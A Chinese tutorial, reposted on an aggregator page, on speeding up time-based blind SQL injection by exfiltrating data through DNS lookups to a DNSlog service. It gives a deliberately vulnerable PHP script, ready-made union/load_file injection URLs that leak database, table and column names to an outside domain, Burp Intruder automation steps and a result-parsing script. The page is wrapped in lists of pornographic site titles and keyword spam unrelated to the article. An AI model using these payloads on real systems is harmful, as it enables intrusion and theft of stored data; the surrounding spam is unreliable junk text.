日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

json里面的list数据取不出来_sql盲注的困局:利用DNSlog快速导出数据

發布時間:2025/3/15 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 json里面的list数据取不出来_sql盲注的困局:利用DNSlog快速导出数据 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

對于一個sql注入點來說最幸運的就是支持堆疊注入,最蛋疼的就是盲注,盲注里面難搞的就是基于時間的盲注。

我們在本地利用這段代碼進行演示

<?php error_reporting(0); $link = mysqli_connect('localhost','root','root'); mysqli_set_charset($link,'utf8'); mysqli_select_db($link,'test'); $id = $_GET['id']; $sql = "select * from test.order where id=$id"; $res = mysqli_query($link,$sql);

把鏈接丟到sqlmap里面,可以看到sqlmap成功檢測出了時間盲注

在局域網網絡環境延遲很低,并且沒有任何安全軟件的前提下

sqlmap猜解表明的速度依然非常慢,接下來我們嘗試用dns log的方式來獲取數據。

dns猜解數據需要執行

show variables like '%secure%';

1、當secure_file_priv為空,就可以讀取磁盤的目錄。

2、當secure_file_priv為G:,就可以讀取G盤的文件。

3、當secure_file_priv為null,load_file就不能加載文件。

如果secure_file_priv不為空,可以通過設置my.ini來配置。加入secure_file_priv="",然后重啟mysql即可。

還需要一個dnslog的平臺,我一般用 http://ceye.io/

平臺會分配一個子域名

ping一下這個域名

然后即可看到剛才ping的記錄

然后我們測試一下注入點是否支持dns外帶數據。

通過

http://127.0.0.1/test.php?id=1 union select 1,2,3,4 and sleep(10)

猜解到字段數為4,然后測試是否支持dns外帶數據

http://127.0.0.1/test.php?id=1 union select 1,load_file('t1.xxxx.ceye.ioabc'),3,4

可以看到t1的被帶了出來

下面進行數據拆解

查數據庫名

http://127.0.0.1/test.php?id=1 union select 6,load_file(concat('',(select database()),'.xxx.ceye.ioabc')),3,8

數據庫名為test

然后拆解第一個表名

http://127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select table_name from information_schema.tables where table_schema=0x74657374 limit 0,1),'.xxxx.ceye.ioabc')),3,4

第一個表名為admin

然后我們通過burp來進行批量拆解,先查表的數量

http://127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select count(table_name) from information_schema.tables where table_schema=0x74657374 limit 0,1),'.xxx.ceye.ioabc')),3,4

一共有四張表

然后批量獲取表名

127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select table_name from information_schema.tables where table_schema=0x74657374 limit 0,1),'.xxxx.ceye.ioabc')),3,

發送URL到burp的測試器

limit 0,1 后面的0設置為變量

payload選擇

線程設置為 1

然后開始攻擊

完成以后

可以在平臺上查到獲取到的表名

平臺提供文件導出為json文件的功能

下載到本地,放到腳本目錄

#python3 import json#自己平臺的地址 url = '.xxx.ceye.io'f = open('./data.json') json_data = f.read() f.close()data = json.loads(json_data)data_list = []for i in data:data_list.append(i['name'].replace(url,''))data_list = list(set(data_list)) for i in data_list:print(i)

可以去重以后打印出剛才獲取的數據

清理歷史記錄

再通過burp獲取admin表的字段

http://127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select column_name from information_schema.columns where table_name=0x61646D696E limit 0,1),'.xxxx.ceye.ioabc')),3,4

獲取數據

select column_name from information_schema.columns where table_name=0x61646D696E limit 0,1

總結

以上是生活随笔為你收集整理的json里面的list数据取不出来_sql盲注的困局:利用DNSlog快速导出数据的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 一区二区三区日韩视频 | 日韩精品一区二区在线观看 | 日韩精品在线一区 | 国产一区欧美日韩 | 五十路六十路七十路熟婆 | 日本一二三区视频 | 免费成人在线观看动漫 | 天堂va蜜桃一区二区三区漫画版 | 久久精品操 | 久久久久久久久久久国产精品 | 亚洲生活片 | 免费av在线网址 | 97在线视频免费 | 亚洲欧洲一级 | 伊人久久久久久久久久久久 | 中文精品无码中文字幕无码专区 | 8050午夜一级毛片久久亚洲欧 | 就操网 | 在线亚洲天堂 | 欧美交换国产一区内射 | 网站免费视频www | 奇米色在线 | 日韩成人久久 | 性一交一乱一色一免费无遮挡 | 夜夜躁很很躁日日躁麻豆 | 久艹在线观看视频 | 成人久久久精品国产乱码一区二区 | 国产无遮挡裸体免费视频 | 性色av无码久久一区二区三区 | 久久精品性爱视频 | 亚洲一区在线视频观看 | 亚洲黄网站在线观看 | 台湾佬美性中文 | 日韩女同互慰一区二区 | 日韩高清在线一区二区 | av中文在线资源 | 欧美日韩少妇 | 国产精品成人自拍 | 国产精品伦一区二区三级视频 | avwww.| 顶级嫩模啪啪呻吟不断好爽 | 人人色网 | 亚洲精品视频在线观看免费视频 | 性欢交69精品久久久 | 亚洲v在线 | 狠狠91| 热久久这里只有精品 | 白浆影院| 九九99精品| 精品无码人妻一区二区三区 | 98色| 成年人深夜福利 | 日本三级免费 | 重口另类| 97福利视频 | 91欧美日韩麻豆精品 | 国产精品美女一区二区三区 | 色久网| jizz欧美性23| 日本中文字幕在线视频 | 亚洲一卡二卡在线观看 | 销魂美女一区二区 | 亚洲aⅴ在线观看 | 求一个黄色网址 | 成年免费在线观看 | 精品国产aⅴ一区二区三区东京热 | 国产一区导航 | 久久蜜桃av一区二区天堂 | 麻豆一区产品精品蜜桃的特点 | 黄色av免费网站 | 亚洲在线观看一区二区 | 亚洲视频在线免费观看 | youjizz.com最新 | 久久久999| 亚洲av久久久噜噜噜噜 | 日日射日日干 | 色夜av| 蜜桃网站 | 国产日产欧美一区二区 | 麻豆视频网址 | 青青草原综合久久大伊人精品 | 亚洲羞羞 | 91精品国产综合久久精品图片 | 欧美另类亚洲 | 日韩精品在线一区 | www.天天操.com | 粉嫩精品久久99综合一区 | 中文字幕精品在线 | 成人国产精品久久久 | 免费色网址 | 亚洲精品无码成人 | 神宫寺奈绪一区二区三区 | 欧美日韩一区二区三区不卡 | 蜜臀999| 不卡的av片 | 在线观看黄色免费视频 | 成年黄色片 | 91精品又粗又猛又爽 | 中文字幕亚洲图片 |